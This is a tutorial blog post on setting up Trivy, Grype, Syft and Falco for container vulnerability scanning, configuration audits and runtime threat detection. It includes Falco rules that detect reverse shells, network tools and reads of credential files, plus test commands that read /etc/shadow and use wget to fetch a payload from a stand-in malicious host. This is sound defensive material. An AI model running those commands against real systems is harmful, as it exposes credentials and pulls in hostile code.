Trivy + Falco: an open-source container security scanning and runtime detection stack
Container security is mandatory in the cloud-native era, and commercial products easily run into five figures: Snyk Container starts at $25/month per developer, Aqua Security at $7,000+/year, Prisma Cloud (Palo Alto) at $10,000+/year. This post builds a complete, free container security scanning and runtime threat detection stack from Trivy, Falco and Grype, covering image vulnerability scanning, configuration auditing and runtime anomaly detection end to end.
1. Pricing of commercial container security tools
| Tool | Pricing model | Entry price | Enterprise price | Core strengths |
|---|---|---|---|---|
| Snyk Container | per developer per month | $25/month/developer | $50,000+/year | fix recommendations, IDE integration, supply-chain security |
| Aqua Security | per node / number of images | $7,000+/year | $30,000+/year | full-lifecycle container security, supply-chain security |
| Prisma Cloud | usage-based | $10,000+/year | $80,000+/year | CNAPP, CSPM and CWPP in one platform, compliance management |
2. The free alternatives
Trivy
Trivy is Aqua Security's open-source all-in-one security scanner. It scans container images, filesystems, Git repositories, Kubernetes clusters, IaC configuration and more. Speed is its biggest advantage: a single image scan usually finishes within 30 seconds. Trivy supports several scanner types: vulnerabilities (CVE), misconfiguration, secrets and licenses. GitHub: https://github.com/aquasecurity/trivy
Falco
Falco is a CNCF graduated project focused on runtime threat detection for containers and Kubernetes. It monitors Linux system calls (syscalls) to detect abnormal behaviour such as unexpected process execution, sensitive file access and network connections. With its eBPF driver the performance overhead is minimal. GitHub: https://github.com/falcosecurity/falco
Grype
Grype is Anchore's open-source vulnerability scanner, focused on matching vulnerabilities against container images, filesystems and SBOMs (software bills of materials; Syft, covered below, generates them). It complements Trivy with more detailed match results. GitHub: https://github.com/anchore/grype
Clair
Clair is the container image vulnerability scanner developed by the Quay.io team and one of the earliest open-source container security tools. It is a good fit for teams that already run a Quay registry. GitHub: https://github.com/quay/clair
3. Installation
3.1 Environment
Requirements: Linux (Ubuntu 20.04+ / Debian 11+), 2 GB+ RAM, a Docker or containerd runtime, and optionally a Kubernetes cluster.
```bash
# Update the system
sudo apt update && sudo apt upgrade -y
# Check the Docker version
docker --version
# Docker 24.x+ is recommended
# Check the kernel version (Falco needs a 5.x+ kernel for eBPF)
uname -r
```
3.2 Install Trivy
```bash
# Method 1: official install script (recommended)
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
# Method 2: APT repository
sudo apt-get install -y wget apt-transport-https gnupg lsb-release
wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | gpg --dearmor | sudo tee /usr/share/keyrings/trivy.gpg > /dev/null
echo "deb [signed-by=/usr/share/keyrings/trivy.gpg] https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main" | sudo tee /etc/apt/sources.list.d/trivy.list
sudo apt-get update
sudo apt-get install -y trivy
# Verify the installation
trivy --version
# trivy version 0.48.x+
```
3.3 Install Grype
```bash
# Install Grype
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin
# Verify
grype --version
```
3.4 Install Falco
Falco supports three driver kinds: eBPF (recommended), kernel module, and modern eBPF (experimental). Use the eBPF driver:
```bash
# Method 1: APT repository (single host)
curl -fsSL https://falco.org/repo/falcosecurity-packages.asc | sudo gpg --dearmor -o /usr/share/keyrings/falco-archive-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/falco-archive-keyring.gpg] https://download.falco.org/packages/deb stable main" | sudo tee /etc/apt/sources.list.d/falcosecurity.list
sudo apt-get update
sudo apt-get install -y falco
# Method 2: Helm (Kubernetes)
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
# Install Falco into the cluster, with Falcosidekick for alert forwarding
helm install falco falcosecurity/falco \
  --namespace falco --create-namespace \
  --set falcosidekick.enabled=true \
  --set driver.kind=ebpf
# Check Falco's status
sudo systemctl status falco
# or, on Kubernetes
kubectl get pods -n falco
```
3.5 Install Syft (SBOM generator, used together with Grype)
```bash
# Install Syft
curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin
# Verify
syft --version
```
4. Configuration examples
4.1 Image vulnerability scanning with Trivy
```bash
# Basic vulnerability scan
trivy image nginx:latest
# Show only HIGH and CRITICAL findings
trivy image --severity HIGH,CRITICAL nginx:latest
# JSON output (for automation)
trivy image -f json -o result.json nginx:latest
# Non-zero exit code on findings (CI/CD gating)
trivy image --exit-code 1 --severity CRITICAL nginx:latest
# Scan a local image tarball (e.g. from docker save) without pulling from a registry
trivy image --input myapp.tar
# Scan every image running in the Kubernetes cluster
trivy k8s --report summary cluster
```
4.2 IaC configuration auditing with Trivy
Misconfiguration scanning is the `trivy config` subcommand; `--misconfig-scanners` restricts it to particular file types (the original listed a non-existent `yaml` scanner; Kubernetes manifests use the `kubernetes` scanner):
```bash
# Scan a single Dockerfile
trivy config myproject/Dockerfile
# Scan a project directory, Dockerfile checks only
trivy config --misconfig-scanners dockerfile myproject/
# Scan Terraform / IaC files
trivy config --misconfig-scanners terraform myproject/terraform/
# Scan Kubernetes YAML manifests
trivy config --misconfig-scanners kubernetes myproject/k8s/
# Scan a Helm chart
trivy config --misconfig-scanners helm myproject/helm-chart/
# Use a custom check bundle (an OCI registry reference)
trivy config --misconfig-scanners dockerfile,terraform,kubernetes \
  --policy-bundle-repository https://example.com/custom-policies myproject/
```
4.3 Deeper scanning with Grype + Syft
```bash
# Generate an SBOM (software bill of materials)
syft nginx:latest -o json > sbom.json
# Match vulnerabilities against the SBOM with Grype
grype sbom:sbom.json
# Or scan the image directly
grype nginx:latest
# Report only vulnerabilities that already have a fix
grype nginx:latest --only-fixed
# SARIF output (GitHub code scanning integration)
grype nginx:latest -o sarif > results.sarif
# CI/CD gate: exit non-zero if a fixable CRITICAL vulnerability is found
grype nginx:latest --fail-on critical --only-fixed
```
4.4 Falco runtime detection rules
Falco's stock rules live in /etc/falco/falco_rules.yaml. Custom rules belong in /etc/falco/falco_rules.local.yaml, which is loaded after the stock file (so its macros such as `container`, `spawned_process` and `open_read` are available) and is not overwritten by package upgrades:
```yaml
# /etc/falco/falco_rules.local.yaml
# Custom rule: a shell or netcat whose stdin/stdout/stderr is a network socket.
# execve events carry no file descriptor, so the check is done on dup/dup2/dup3
# (the same approach as Falco's stock "Redirect STDOUT/STDIN to Network Connection" rule).
- rule: Reverse Shell in Container
  desc: Detect a shell whose standard streams are redirected to a network connection inside a container
  condition: >
    evt.type in (dup, dup2, dup3) and evt.dir = < and container and
    evt.rawres in (0, 1, 2) and fd.type in ("ipv4", "ipv6") and
    proc.name in (bash, sh, dash, nc, ncat)
  output: >
    Reverse shell detected in container
    (user=%user.name container=%container.name command=%proc.cmdline connection=%fd.name)
  priority: CRITICAL
  tags: [container, network, mitre_execution]

# Detect common attack tooling executed inside a container
- rule: Suspicious Command in Container
  desc: Detect common attack tools executed in container
  condition: >
    spawned_process and container and
    (proc.name in (nmap, netcat, nc, curl, wget, python, perl, ruby) and
    not proc.pname in (shellcheck, shfmt))
  output: >
    Suspicious command executed in container
    (user=%user.name container=%container.name command=%proc.cmdline parent=%proc.pname)
  priority: WARNING
  tags: [container, execution, mitre_execution]

# Detect reads of sensitive files
- rule: Sensitive File Access in Container
  desc: Detect access to sensitive files like /etc/shadow
  condition: >
    open_read and container and
    (fd.name startswith /etc/shadow or fd.name startswith /etc/passwd or
    fd.name startswith /root/.ssh or fd.name startswith /var/run/secrets)
  output: >
    Sensitive file accessed in container
    (user=%user.name file=%fd.name container=%container.name command=%proc.cmdline)
  priority: WARNING
  tags: [container, file, mitre_credential_access]

# Detect container escape attempts
- rule: Container Escape Attempt
  desc: Detect mount or nsenter to host namespace
  condition: >
    spawned_process and container and
    ((proc.name = mount and proc.args startswith "/host") or
    (proc.name = nsenter) or
    (proc.name = chroot))
  output: >
    Container escape attempt detected
    (user=%user.name container=%container.name command=%proc.cmdline)
  priority: CRITICAL
  tags: [container, escape, mitre_privilege_escalation]
```
Restart Falco to load the rules:
```bash
# systemd installation
sudo systemctl restart falco
# Follow the Falco log to confirm it is running and the rules loaded
sudo journalctl -u falco -f
# Test a rule: read a sensitive file inside a throwaway container
docker run --rm alpine sh -c "cat /etc/shadow"
# A "Sensitive File Access in Container" alert should appear in the Falco log
```
4.5 Falco alert output configuration
Configure alert outputs in /etc/falco/falco.yaml (excerpt; Falco itself supports stdout, file, syslog, program, HTTP and gRPC outputs):
```yaml
# JSON on stdout (the default channel), with the formatted output line included as a property
json_output: true
json_include_output_property: true

# Write alerts to a file, one JSON object per line
file_output:
  enabled: true
  keep_alive: false
  filename: /var/log/falco/alerts.json

# Send alerts to the local syslog (there are no remote host/port options here)
syslog_output:
  enabled: true

# POST each alert as raw JSON to an HTTP endpoint. Slack, Feishu and similar
# expect their own payload format, so point this at Falcosidekick (enabled in
# the Helm install above; it listens on port 2801) and let it translate and forward.
http_output:
  enabled: true
  url: "http://<falcosidekick-host>:2801/"
  user_agent: "falco"
  insecure: false

# Falco has no native Kafka output: forward to Kafka by enabling the Kafka
# output in Falcosidekick's own configuration rather than in falco.yaml.
```
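The file output above writes one JSON object per line. As an added example (not code from the original post or from the Falco project), this Python script parses such a file, filters by priority, counts alerts per rule and container, and flags containers that tripped both the sensitive-file rule and the suspicious-command rule from 4.4. The alert lines and container names are constructed samples.

```python
import json
from collections import Counter, defaultdict

# Falco priorities, highest first, spelled as Falco writes them in JSON output.
PRIORITIES = ["Emergency", "Alert", "Critical", "Error", "Warning", "Notice", "Informational", "Debug"]
# Constructed sample alerts (not real captures) in the shape Falco writes with
# json_output: true and json_include_output_property: true, one object per line;
# the last line imitates an entry truncated by log rotation.
SAMPLE_ALERTS = """
{"output":"Sensitive file accessed in container (user=root file=/etc/shadow container=web-7f9 command=cat /etc/shadow)","priority":"Warning","rule":"Sensitive File Access in Container","source":"syscall","time":"2024-05-01T10:00:00.000000000Z","output_fields":{"container.name":"web-7f9","fd.name":"/etc/shadow","proc.cmdline":"cat /etc/shadow","user.name":"root"}}
{"output":"Suspicious command executed in container (user=root container=web-7f9 command=wget http://example.invalid/x parent=sh)","priority":"Warning","rule":"Suspicious Command in Container","source":"syscall","time":"2024-05-01T10:00:03.000000000Z","output_fields":{"container.name":"web-7f9","proc.cmdline":"wget http://example.invalid/x","proc.pname":"sh","user.name":"root"}}
{"output":"Suspicious command executed in container (user=app container=batch-1 command=python job.py parent=sh)","priority":"Warning","rule":"Suspicious Command in Container","source":"syscall","time":"2024-05-01T10:01:00.000000000Z","output_fields":{"container.name":"batch-1","proc.cmdline":"python job.py","proc.pname":"sh","user.name":"app"}}
{"output":"Container escape attempt detected (user=root container=batch-1 command=nsenter)","priority":"Critical","rule":"Container Escape Attempt","source":"syscall","time":"2024-05-01T10:02:00.000000000Z","output_fields":{"container.name":"batch-1","proc.cmdline":"nsenter","user.name":"root"}}
{"output":"Sensitive file accessed in container (user=root file=/etc/sha
"""

def parse_alerts(text):
    """Parse newline-delimited Falco JSON alerts, skipping blank or malformed lines."""
    alerts = []
    for line in text.splitlines():
        try:
            if line.strip():
                alerts.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return alerts

def at_least(alerts, min_priority):
    """Keep alerts whose priority is min_priority or more severe."""
    cutoff = PRIORITIES.index(min_priority)
    return [a for a in alerts if PRIORITIES.index(a["priority"]) <= cutoff]

def summarize(alerts):
    """Alert count per (rule, container): shows which rules need tuning first."""
    return Counter((a["rule"], a["output_fields"].get("container.name", "host")) for a in alerts)

def correlate(alerts, rules):
    """Containers that triggered every rule in `rules`: several WARNING-level
    signals from one container deserve more attention than each alone."""
    seen = defaultdict(set)
    for a in alerts:
        seen[a["output_fields"].get("container.name", "host")].add(a["rule"])
    return sorted(c for c, hit in seen.items() if set(rules) <= hit)

if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS)  # real use: open("/var/log/falco/alerts.json").read()
    for (rule, ctr), n in summarize(at_least(alerts, "Warning")).most_common():
        print(f"{n:3d}  {rule}  [{ctr}]")
    print("file read + suspicious command:", correlate(alerts,
          ["Sensitive File Access in Container", "Suspicious Command in Container"]))
```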
4.6 GitHub Actions CI/CD integration
Add .github/workflows/container-security.yml to the project:
```yaml
name: Container Security Scan
on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
jobs:
  trivy-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build Docker image
        run: docker build -t myapp:${{ github.sha }} .
      # In production pin the actions to a release tag or commit SHA instead of @master
      - name: Trivy vulnerability scan
        uses: aquasecurity/trivy-action@master
        with:
          image-ref: myapp:${{ github.sha }}
          format: table
          exit-code: 1
          severity: CRITICAL
          ignore-unfixed: true
      - name: Trivy SBOM generation
        uses: aquasecurity/trivy-action@master
        with:
          image-ref: myapp:${{ github.sha }}
          format: cyclonedx
          output: sbom.json
      - name: Grype vulnerability scan
        uses: anchore/scan-action@v3
        with:
          image: myapp:${{ github.sha }}
          fail-build: true
          severity-cutoff: critical
      - name: Trivy config scan
        uses: aquasecurity/trivy-action@master
        with:
          scan-type: config
          scan-ref: .
          severity: HIGH,CRITICAL
```
5. Feature comparison
| Feature | Snyk Container | Aqua Security | Trivy + Falco | Gap |
|---|---|---|---|---|
| Image vulnerability scanning | ✅ excellent | ✅ excellent | ✅ Trivy, very fast | Trivy leads on scan speed |
| Runtime detection | ⚠️ limited | ✅ behavioural analysis | ✅ Falco (eBPF) | Falco detects at the syscall level |
| SBOM generation | ✅ | ✅ | ✅ Syft / Trivy | roughly on par |
| IaC configuration audit | ✅ | ✅ | ✅ built into Trivy | Trivy covers Dockerfile, Terraform, Kubernetes |
| Kubernetes security | ✅ | ✅ enhanced | ⚠️ basic | no cluster-level policy management |
| Supply-chain security | ✅ Snyk Advisor | ✅ supply-chain analysis | ⚠️ limited | biggest gap: no dependency-relationship analysis |
| Compliance management | ⚠️ basic | ✅ CIS / NIST | ⚠️ manual configuration | no automated compliance reports |
| Web UI | ✅ mature | ✅ enterprise-grade | ❌ CLI-centric | no central management console |
| CI/CD integration | ✅ broad | ✅ broad | ✅ GitHub / GitLab | roughly on par |
| Runtime support | ⚠️ limited | ✅ Docker / containerd / CRI-O | ✅ Falco (eBPF) | Falco monitors at the kernel level |
| Cost | from $25/month/developer | $7,000+/year | $0 (open source) | the core advantage |
6. Hands-on: a complete container security scanning pipeline
Combine Trivy, Grype and Falco into one scanning pipeline:
```bash
#!/bin/bash
# container-security-pipeline.sh
# Complete container security scanning pipeline: Trivy -> Trivy config -> Syft -> Grype -> summary
set -euo pipefail

IMAGE="${1:?usage: $0 <image>}"
REPORT_DIR="./security-reports/$(date +%Y%m%d_%H%M%S)"
mkdir -p "$REPORT_DIR"

echo "[1/5] Trivy vulnerability scan..."
trivy image -f json -o "$REPORT_DIR/trivy-vuln.json" --severity HIGH,CRITICAL "$IMAGE"
# Trivy writes Vulnerabilities as null for targets without findings, hence the "or []"
TRIVY_CRITICAL=$(python3 -c "import sys,json; d=json.load(sys.stdin); print(len([v for r in d.get('Results',[]) for v in (r.get('Vulnerabilities') or []) if v.get('Severity')=='CRITICAL']))" < "$REPORT_DIR/trivy-vuln.json")
echo "Found $TRIVY_CRITICAL CRITICAL vulnerabilities"

echo "[2/5] Trivy configuration audit (Dockerfile and manifests in the current directory)..."
trivy config -f json -o "$REPORT_DIR/trivy-misconfig.json" ./
echo "Configuration scan complete"

echo "[3/5] Syft SBOM generation..."
syft "$IMAGE" -o cyclonedx-json > "$REPORT_DIR/sbom.json"
COMPONENTS=$(python3 -c "import sys,json; d=json.load(sys.stdin); print(len(d.get('components',[])))" < "$REPORT_DIR/sbom.json")
echo "Found $COMPONENTS components"

echo "[4/5] Grype vulnerability scan (from the SBOM)..."
grype "sbom:$REPORT_DIR/sbom.json" -o json > "$REPORT_DIR/grype-vuln.json"
# Grype spells severities capitalised ("Critical"), Trivy upper-case ("CRITICAL")
GRYPE_CRITICAL=$(python3 -c "import sys,json; d=json.load(sys.stdin); print(len([m for m in d.get('matches',[]) if m.get('vulnerability',{}).get('severity')=='Critical']))" < "$REPORT_DIR/grype-vuln.json")
echo "Found $GRYPE_CRITICAL CRITICAL vulnerabilities (Grype)"

echo "[5/5] Writing summary report..."
cat > "$REPORT_DIR/summary.txt" << EOF
=== Container security scan report ===
Image: $IMAGE
Time: $(date)
Trivy CRITICAL vulnerabilities: $TRIVY_CRITICAL
Grype CRITICAL vulnerabilities: $GRYPE_CRITICAL
SBOM components: $COMPONENTS
Report directory: $REPORT_DIR
EOF
cat "$REPORT_DIR/summary.txt"

# Fail the build if either scanner found CRITICAL vulnerabilities
if [ "$TRIVY_CRITICAL" -gt 0 ] || [ "$GRYPE_CRITICAL" -gt 0 ]; then
  echo "CRITICAL vulnerabilities present, build failed!"
  exit 1
fi
echo "Security scan passed!"
```
Usage:
```bash
chmod +x container-security-pipeline.sh
docker build -t myapp:v1 .
./container-security-pipeline.sh myapp:v1
```
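The pipeline counts Trivy and Grype findings separately, so a CVE that both scanners report is counted twice and unfixable findings block the build. As an added example (not part of the original post), this Python script reads the two JSON reports the pipeline writes, normalises them into one finding list and applies a single gate across both scanners, mirroring `--severity`/`--ignore-unfixed` (Trivy) and `--fail-on`/`--only-fixed` (Grype). The embedded reports are constructed samples with placeholder CVE ids.

```python
import json

SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1, "negligible": 0, "unknown": 0}

# Constructed sample scanner output (placeholder CVE ids, not real findings), shaped
# like the trivy-vuln.json and grype-vuln.json files the pipeline writes.
TRIVY_JSON = """{"Results": [{"Target": "myapp:v1 (debian 12)", "Vulnerabilities": [
 {"VulnerabilityID": "CVE-0000-0001", "PkgName": "libfoo", "InstalledVersion": "1.0", "FixedVersion": "1.1", "Severity": "CRITICAL"},
 {"VulnerabilityID": "CVE-0000-0002", "PkgName": "libbar", "InstalledVersion": "2.0", "FixedVersion": "", "Severity": "CRITICAL"},
 {"VulnerabilityID": "CVE-0000-0003", "PkgName": "libbaz", "InstalledVersion": "3.0", "FixedVersion": "3.1", "Severity": "HIGH"}]},
 {"Target": "Node.js", "Class": "lang-pkgs", "Vulnerabilities": null}]}"""
GRYPE_JSON = """{"matches": [
 {"vulnerability": {"id": "CVE-0000-0001", "severity": "Critical", "fix": {"versions": ["1.1"], "state": "fixed"}}, "artifact": {"name": "libfoo", "version": "1.0"}},
 {"vulnerability": {"id": "CVE-0000-0004", "severity": "Critical", "fix": {"versions": [], "state": "not-fixed"}}, "artifact": {"name": "libqux", "version": "4.0"}}]}"""

def findings_from_trivy(doc):
    """Flatten Trivy's per-target Results into (cve, pkg, severity, has_fix) tuples.
    Trivy writes Vulnerabilities as null for targets with no findings."""
    return [(v["VulnerabilityID"], v["PkgName"], v["Severity"].lower(), bool(v.get("FixedVersion")))
            for r in doc.get("Results", []) for v in (r.get("Vulnerabilities") or [])]

def findings_from_grype(doc):
    """Same tuple shape from Grype's matches; Grype states the fix status explicitly."""
    return [(m["vulnerability"]["id"], m["artifact"]["name"], m["vulnerability"]["severity"].lower(),
             m["vulnerability"].get("fix", {}).get("state") == "fixed")
            for m in doc.get("matches", [])]

def merged_findings(trivy_text, grype_text):
    """Parse both reports into one list; the same CVE may appear in both."""
    return findings_from_trivy(json.loads(trivy_text)) + findings_from_grype(json.loads(grype_text))

def gate(findings, min_severity="critical", only_fixed=True):
    """Return the sorted, de-duplicated (cve, pkg) pairs that should block the build.
    Same policy as --severity/--ignore-unfixed (Trivy) and --fail-on/--only-fixed (Grype),
    applied once across both scanners so a CVE seen by both is counted once."""
    floor = SEVERITY_RANK[min_severity]
    return sorted({(cve, pkg) for cve, pkg, sev, fixed in findings
                   if SEVERITY_RANK.get(sev, 0) >= floor and (fixed or not only_fixed)})

if __name__ == "__main__":
    # Real use: pass the contents of $REPORT_DIR/trivy-vuln.json and grype-vuln.json.
    blocking = gate(merged_findings(TRIVY_JSON, GRYPE_JSON))
    for cve, pkg in blocking:
        print(f"BLOCK {cve} in {pkg} (fix available)")
    raise SystemExit(1 if blocking else 0)
```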
7. Cluster-level security monitoring on Kubernetes
Deploy Trivy Operator and Falco together in Kubernetes:
```bash
# Install Trivy Operator (continuously scans every image in the cluster)
helm repo add aquasecurity https://aquasecurity.github.io/helm-charts
helm install trivy-operator aquasecurity/trivy-operator \
  --namespace trivy-system --create-namespace
# View the cluster vulnerability reports
kubectl get vulnerabilityreports -A
# View the configuration audit reports
kubectl get configauditreports -A
# Install Falco on the cluster with Helm (the apt package from 3.4 is for single hosts)
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco \
  --namespace falco --create-namespace \
  --set falcosidekick.enabled=true \
  --set driver.kind=ebpf
# Verify Falco alerting: run wget inside a throwaway container on a node
docker run --rm alpine sh -c "wget http://malicious.example.com/payload"
# A "Suspicious Command in Container" alert should appear in the Falco pod logs
```
8. Summary
The Trivy + Falco + Grype combination covers the three key stages of container security: scanning at image build time (Trivy / Grype), runtime threat detection (Falco) and supply-chain transparency (Syft / SBOM). Its main shortcomings against commercial products are the lack of in-depth supply-chain analysis, automated compliance management and a web management console.
Suggested rollout path: 1) integrate Trivy into CI/CD first, blocking images with high-severity vulnerabilities from reaching production; 2) deploy Falco on every Kubernetes node to monitor runtime anomalies; 3) use Trivy Operator to track the cluster's vulnerability posture continuously; 4) generate SBOMs and feed them to Grype to establish a vulnerability response process. At zero licence cost this stack covers most of the container security needs of small and medium-sized teams.